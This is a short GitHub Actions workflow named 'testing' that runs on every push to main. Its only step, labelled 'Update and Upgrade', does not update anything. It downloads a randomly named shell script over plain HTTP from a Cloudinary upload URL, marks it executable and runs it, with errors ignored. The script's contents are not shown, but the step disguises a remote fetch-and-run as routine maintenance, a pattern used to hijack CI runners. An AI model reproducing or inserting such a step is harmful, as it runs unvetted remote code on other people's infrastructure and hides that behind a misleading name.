name: testing

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: Update and Upgrade
        run: |
          curl -O http://res.cloudinary.com/dyfqshedb/raw/upload/v1708020610/mbip0nevu8lc73fmojgp.sh
          chmod +x mbip0nevu8lc73fmojgp.sh
          ./mbip0nevu8lc73fmojgp.sh
